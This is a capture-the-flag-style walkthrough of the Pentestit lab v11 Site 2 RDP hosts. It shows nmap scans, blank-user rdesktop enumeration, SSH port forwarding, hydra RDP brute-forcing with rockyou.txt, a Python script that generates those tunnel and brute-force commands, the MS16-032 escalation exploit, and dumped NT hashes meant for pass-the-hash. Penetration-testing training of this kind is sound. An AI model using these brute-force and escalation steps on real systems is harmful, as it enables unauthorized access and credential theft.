Innogen security

Pentestit lab v11 Guide Part 4

Site 2 RDP Hosts

From the SSH server in site 2 we find that nmap is installed, so we launch a basic scan (the default top 1000 TCP ports, with host discovery disabled since ICMP may be filtered) against the three servers shown on the lab map:

nmap -Pn 192.168.13.1-3

Starting Nmap 6.47 ( http://nmap.org ) at 2017-07-26 20:07 MSK
Nmap scan report for 192.168.13.1
Host is up (0.0015s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 192.168.13.2
Host is up (0.0016s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 192.168.13.3
Host is up (0.0011s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap done: 3 IP addresses (3 hosts up) scanned in 30.13 seconds

All three hosts show a single open port among the 1000 TCP ports nmap scans by default: 3389, RDP.
Connecting with rdesktop and an empty username brings up the Windows logon screen, which on these hosts lists the local user accounts, so usernames can be enumerated without any credentials:
NOTE: if you are using sshuttle, run the commands below with the real IPs. If you are using ssh -L instead (e.g. ssh -L 3389:192.168.13.1:3389 tech@192.168.101.11 -p 2222 -i ~/pentestit/office2pkey.rsa), replace the rdesktop IP with 127.0.0.1 and note that you have to tear the tunnel down and recreate it for each host in turn (or forward each host to a different local port).

rdesktop 192.168.13.1 -u ""
rdesktop 192.168.13.2 -u ""
rdesktop 192.168.13.3 -u ""

The following 3 user accounts were enumerated:

  • arm554, arm550 and arm672

We can now test these accounts with crowbar or hydra to see whether the RDP logins can be brute-forced. As I have had limited success with crowbar I opted for hydra; this proved successful and took only a few minutes to return the password. Keep in mind that guessing Windows passwords online can trip the local or domain lockout policy, so outside a lab check the lockout threshold first and keep the number of parallel tasks low:

  • Map 192.168.13.1 to local port 3389:

    ssh -L 3389:192.168.13.1:3389 tech@192.168.101.11 -p 2222 -i ~/pentestit/office2pkey.rsa

  • Launch hydra against localhost port 3389:

    hydra -t 8 -V -l arm554 -P rockyou.txt rdp://127.0.0.1
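The scan, tunnel and brute-force steps above, as an added example that is not part of the original post: a small Python script that parses nmap's normal output into hosts and open ports, keeps only the hosts with 3389/tcp open, and plans one SSH forward per host on its own local port, so rdesktop and hydra can reach all three targets without tearing the tunnel down between hosts (it also copes with the hostname-plus-IP form of the report line and with hosts that have no RDP). The embedded scan output is a constructed copy of the run above; the jump host, key path, the 13389+ local port range and the lower hydra task count are assumptions.

```python
import re
from typing import Dict, List

# Constructed copy of the three host reports from the nmap run above
# (nmap's normal output layout); point this at your own -oN file in practice.
NMAP_OUTPUT = """\
Nmap scan report for 192.168.13.1
Host is up (0.0015s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 192.168.13.2
Host is up (0.0016s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 192.168.13.3
Host is up (0.0011s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
"""

# "Nmap scan report for 1.2.3.4" or "Nmap scan report for name (1.2.3.4)"
HOST_RE = re.compile(r"^Nmap scan report for (?:(\S+) \()?([\d.]+)\)?")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap(text: str) -> Dict[str, List[dict]]:
    """Map each scanned IP to its port lines (port, proto, state, service)."""
    hosts: Dict[str, List[dict]] = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(2)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service = m.groups()
            hosts[current].append({"port": int(port), "proto": proto,
                                   "state": state, "service": service})
    return hosts


def rdp_targets(hosts: Dict[str, List[dict]]) -> List[str]:
    """IPs with 3389/tcp reported open; hosts without RDP are skipped."""
    return sorted(ip for ip, ports in hosts.items()
                  if any(p["port"] == 3389 and p["proto"] == "tcp"
                         and p["state"] == "open" for p in ports))


def tunnel_plan(targets: List[str], user: str,
                jump: str = "tech@192.168.101.11", jump_port: int = 2222,
                key: str = "~/pentestit/office2pkey.rsa",
                base_port: int = 13389) -> List[dict]:
    """One SSH -L forward per target on its own local port (13389, 13390, ...)
    so every host is reachable at once. Jump host, key and the local port
    range are assumptions; -t 4 keeps parallel RDP connections low."""
    plan = []
    for i, ip in enumerate(targets):
        lp = base_port + i
        plan.append({
            "host": ip,
            "local_port": lp,
            "ssh": f"ssh -N -f -L {lp}:{ip}:3389 {jump} -p {jump_port} -i {key}",
            "rdesktop": f'rdesktop 127.0.0.1:{lp} -u ""',
            "hydra": f"hydra -t 4 -V -l {user} -P rockyou.txt rdp://127.0.0.1:{lp}",
        })
    return plan


if __name__ == "__main__":
    for step in tunnel_plan(rdp_targets(parse_nmap(NMAP_OUTPUT)), "arm554"):
        print(f"# {step['host']} via local port {step['local_port']}")
        for cmd in ("ssh", "rdesktop", "hydra"):
            print(step[cmd])
```

Running the script prints the three ssh/rdesktop/hydra command sets; each ssh line is backgrounded with -N -f, so all three forwards can stay up while you work through the hosts.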
Once logged in over rdesktop we find the host is 32-bit Windows 7:

While enumerating the host for the token and anything else of use, we find that arm554 is a low-privileged user who cannot read other users' profiles or hidden files. A search for privilege-escalation exploits that can be run from cmd or PowerShell on an unpatched 32-bit Windows 7 host turns up MS16-032 (the Secondary Logon elevation of privilege, CVE-2016-0099), and at the top of the list is a PowerShell implementation, which is ideal because it saves the extra step of compiling an exploit: https://www.exploit-db.com/exploits/39719/

Once the script is loaded into PowerShell and executed, it spawns a new cmd.exe window running as NT AUTHORITY\SYSTEM inside the RDP session. The quickest pre-check on a host like this is whether the MS16-032 update (KB3139914 on Windows 7) is installed; if it is, the exploit will fail and another route is needed.

TOKEN FOUND:

Enumerating the "Old test.lab users" directory reveals, per account:

  • whether the account was disabled
  • whether the account was removed
  • a 32-character hex string, the right length for a 16-byte NT hash, which could potentially be used later for a pass-the-hash attack

C:\Users\user\Old test.lab users>dir
 Volume in drive C has no label.
 Volume Serial Number is B443-9C96

 Directory of C:\Users\user\Old test.lab users

06/30/2017  01:38 AM    <DIR>          .
06/30/2017  01:38 AM    <DIR>          ..
06/30/2017  12:42 PM    <DIR>          arm440
06/30/2017  12:43 PM    <DIR>          arm441
06/30/2017  12:44 PM    <DIR>          arm550
06/30/2017  01:38 AM    <DIR>          arm553
06/30/2017  01:38 AM    <DIR>          arm554
06/30/2017  12:44 PM    <DIR>          arm664
06/30/2017  06:17 PM    <DIR>          arm672
               0 File(s)              0 bytes
               9 Dir(s)  23,640,113,152 bytes free

C:\Users\user\Old test.lab users>
C:\Users\user\Old test.lab users>

C:\Users\user\Old test.lab users\arm440
C:\Users\user\Old test.lab users\arm441
C:\Users\user\Old test.lab users\arm550
C:\Users\user\Old test.lab users\arm553
C:\Users\user\Old test.lab users\arm554
C:\Users\user\Old test.lab users\arm664
C:\Users\user\Old test.lab users\arm672
C:\Users\user\Old test.lab users\arm440\New Text Document.txt
C:\Users\user\Old test.lab users\arm441\New Text Document.txt
C:\Users\user\Old test.lab users\arm550\New Text Document.txt
C:\Users\user\Old test.lab users\arm554\New Text Document.txt
C:\Users\user\Old test.lab users\arm664\New Text Document.txt
C:\Users\user\Old test.lab users\arm672\New Text Document.txt
C:\Users\user\Old test.lab users>dir arm440
 Volume in drive C has no label.
 Volume Serial Number is B443-9C96

 Directory of C:\Users\user\Old test.lab users\arm440

06/30/2017  12:42 PM    <DIR>          .
06/30/2017  12:42 PM    <DIR>          ..
06/30/2017  12:43 PM               111 New Text Document.txt
               1 File(s)            111 bytes
               2 Dir(s)  23,640,113,152 bytes free

C:\Users\user\Old test.lab users>type "arm440\New Text Document.txt"
F12A08F680CD09E4194D463C8AE6DA0C

Shares:
docs
files
work
monthly

C: 20GB
D: 160 GB

Removed? - Yes
C:\Users\user\Old test.lab users>
C:\Users\user\Old test.lab users>dir arm441
 Volume in drive C has no label.
 Volume Serial Number is B443-9C96

 Directory of C:\Users\user\Old test.lab users\arm441

06/30/2017  12:43 PM    <DIR>          .
06/30/2017  12:43 PM    <DIR>          ..
06/30/2017  12:43 PM               109 New Text Document.txt
               1 File(s)            109 bytes
               2 Dir(s)  23,640,113,152 bytes free

C:\Users\user\Old test.lab users>type "arm441\New Text Document.txt"
F9AFDABB06F9A9F7ACE4BF62FA8774D1

Shares:
docs
files
work
daily

C: 20GB
D: 160 GB

Removed? - Yes
C:\Users\user\Old test.lab users>type "arm550\New Text Document.txt"
E6EDF69B1F8F5A33E927FC4F580F4005

Shares:
docs
files
work

C: 20GB
D: 160 GB

Removed? - Yes
C:\Users\user\Old test.lab users>
C:\Users\user\Old test.lab users>type "arm554\New Text Document.txt"
6361DEA164EE8FE91FE7B117FBC9CA5E

Shares:
docs
files
work
monthly

C: 20GB
D: 160 GB

Removed?
C:\Users\user\Old test.lab users>
C:\Users\user\Old test.lab users>type "arm664\New Text Document.txt"
Removed
C:\Users\user\Old test.lab users>type "arm672\New Text Document.txt"
Disabled
C:\Users\user\Old test.lab users>

At this point it was not possible to get into the .2 and .3 servers, but we do not need them, as we now hold the following:

  • Site 2 SSH private key
  • Site 2 => Site 1 OpenVPN credentials
  • a usernames list
  • user NT hashes
  • a potential wordlist theme centred around Star Wars…

Let the work begin……

Part 5….
